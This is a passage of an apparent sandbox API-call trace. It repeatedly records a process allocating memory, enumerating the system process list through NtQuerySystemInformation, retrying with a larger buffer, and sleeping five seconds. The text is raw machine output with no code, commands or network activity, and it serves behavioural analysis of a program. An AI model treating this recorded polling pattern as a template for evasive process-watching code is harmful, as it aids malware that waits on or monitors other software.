ResultLength=0x0) returned 0x0 [0210.115] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.116] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.117] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.118] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.119] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.129] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.129] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.134] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.135] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.137] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.137] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.138] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.139] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.139] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.144] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.145] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.146] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.147] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.147] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.148] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.148] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.154] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.155] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.157] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.157] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.158] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.158] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.159] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.163] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.164] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.166] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.166] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.167] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.167] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.167] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.172] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.173] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.175] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.175] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.176] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.176] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.176] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.181] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.182] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.184] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.184] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.185] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.185] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.186] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.190] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.191] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.193] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.193] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.194] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.194] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.194] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.199] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.201] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.203] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.203] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.204] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.204] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.205] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.209] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.210] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.212] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.212] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.213] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.214] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.214] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.218] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.219] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.221] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.221] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.222] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.222] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.223] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.227] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.228] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.229] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.229] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.230] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.230] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.231] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.234] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.235] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.236] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.236] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.237] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.237] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.237] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.276] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.277] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.279] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.279] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.280] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.280] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.280] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.284] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.285] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.286] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.286] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.287] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.287] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.287] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.291] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.292] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.293] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.294] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.294] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.298] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.299] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.301] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.302] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.302] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.303] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.303] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.308] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.309] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.310] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.310] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.311] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.312] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.315] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.316] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.317] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.318] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.318] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.318] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.318] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.322] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.323] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.324] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.325] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.325] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.326] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.326] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.329] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.330] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.331] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.331] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.332] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.332] NtAllocateVirtualMemory (in: 